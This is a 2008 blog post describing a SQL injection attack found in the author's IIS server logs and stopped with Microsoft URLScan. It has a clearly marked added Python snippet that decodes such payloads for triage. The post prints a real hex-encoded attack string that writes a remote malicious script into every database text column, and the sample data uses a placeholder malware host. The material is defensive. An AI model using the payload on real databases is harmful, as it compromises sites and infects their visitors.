Accidental Technologist

Musings about Entrepreneurship, Technology and Software Development


Accessorize your Denial of Service or SQL Injection Attack

August 11, 2008 by Rob Bazinet


I was reading some posts on Twitter the past couple of days and noticed some Tweets from Phil Haack and Scott Hanselman regarding an attack on the web servers hosting their blogs, which caused a large spike in traffic. They determined it was some type of Distributed Denial of Service (DDOS) attack. I decided to check the server on which I host this site and, to my surprise, the same thing had been happening to me all day, with a 10x increase in traffic.

I reviewed my server logs and saw some really large QueryStrings being sent which looked like this:

2008-08-08 05:51:53 W3SVC2557 SV2419 74.86.230.234 GET /asp-net/feed/ ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43757273
6F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756
D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874
7970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220464554434
8204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920
424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C6
53E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D
272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646
F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655
F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 69.180.0.90 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+Zango+10.3.74.0) - - accidentaltechnologist.com 200 0 0 27171 1514 3328

It appears this is more of a SQL Injection attack than simply a DDOS. You can see the EXEC(@S) where they are trying to execute some nasty SQL on my server. Rick Strahl has also had some similar problems, and he addresses the issue in IIS 7.0.
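To triage a log entry like the one above, here is an added Python example (not code from the original post) that unescapes an IIS W3C log line, pulls the hex out of the CAST(0x... AS CHAR(4000)) literal, decodes it back to SQL, and lists any <script src=...> URLs that SQL would write into the database. The sample log lines and the hex payload in them are constructed for the example with placeholder addresses; they are not the real entry above.

```python
import re
from urllib.parse import unquote

# SQL Server shape seen in the 2008 mass-injection query strings:
#   SET @S=CAST(0x<hex> AS CHAR(4000));EXEC(@S)
CAST_HEX = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(?:N?VAR)?CHAR\(\d+\)\)", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\"'>\s]+)", re.IGNORECASE)

def decode_hex_payload(hex_blob):
    """Return the SQL hidden inside a 0x... literal (CHAR(4000) is single-byte)."""
    return bytes.fromhex(hex_blob).decode("latin-1")

def analyze_iis_line(line):
    """Inspect one IIS W3C log line. Returns None for clean lines, otherwise a
    dict with the decoded SQL and any <script src=...> URLs it tries to plant."""
    text = unquote(line)                      # %20 -> space, etc.
    hit = CAST_HEX.search(text)
    if hit is None:
        # No hex-wrapped body; still flag the bare DECLARE ... EXEC( shape.
        if re.search(r"DECLARE\s+@\w+.*EXEC\(", text, re.IGNORECASE | re.DOTALL):
            return {"decoded_sql": None, "script_urls": []}
        return None
    sql = decode_hex_payload(hit.group(1))
    return {"decoded_sql": sql, "script_urls": SCRIPT_SRC.findall(sql)}

def scan_log(lines):
    """Return (line_number, analysis) for every suspicious line."""
    return [(n, r) for n, l in enumerate(lines, 1) if (r := analyze_iis_line(l))]

# --- constructed sample data (placeholder host, not the real payload) ---
INNER_SQL = ("DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
             "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id "
             "and a.xtype='u' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
             "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+"
             "''<script src=\"http://malware.example.invalid/w.js\"></script>''') "
             "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor")
HEX_BLOB = INNER_SQL.encode("latin-1").hex().upper()
SAMPLE_LOG = [
    "2008-08-08 05:50:01 W3SVC1 SRV 203.0.113.10 GET /about/ - 80 - 198.51.100.7 HTTP/1.1 Mozilla/5.0 200 0 0",
    "2008-08-08 05:51:53 W3SVC1 SRV 203.0.113.10 GET /asp-net/feed/ ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + HEX_BLOB + "%20AS%20CHAR(4000));EXEC(@S); 80 - 198.51.100.9 HTTP/1.1 Mozilla/4.0 200 0 0",
]

if __name__ == "__main__":
    for n, result in scan_log(SAMPLE_LOG):
        print(n, result["script_urls"])
```

Point scan_log at the lines of a real ex*.log file to get the decoded SQL and the planted script URLs for each hit.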

Not knowing what to do, I went to Twitter and pinged Scott to see what he did to stop the attack; he suggested URLScan from Microsoft. Of course, this is a tool I used back in the day when supporting clients' web servers, to help ward off unfriendly visitors. I had forgotten all about it until Scott mentioned it.

I downloaded URLScan from Microsoft, promptly installed it on my web server, and the DDOS attack stopped almost instantly. The current version of URLScan is 2.5, which says it only works on IIS 6.0, but a beta version of URLScan 3.0 is available for IIS 5.1, 6.0, and 7.0.

Thank you Scott for the quick reply and suggestion to fix my problem.

Technorati Tags: Hackers,DDOS,URLScan,IIS,SQL Injection


Filed Under: IIS
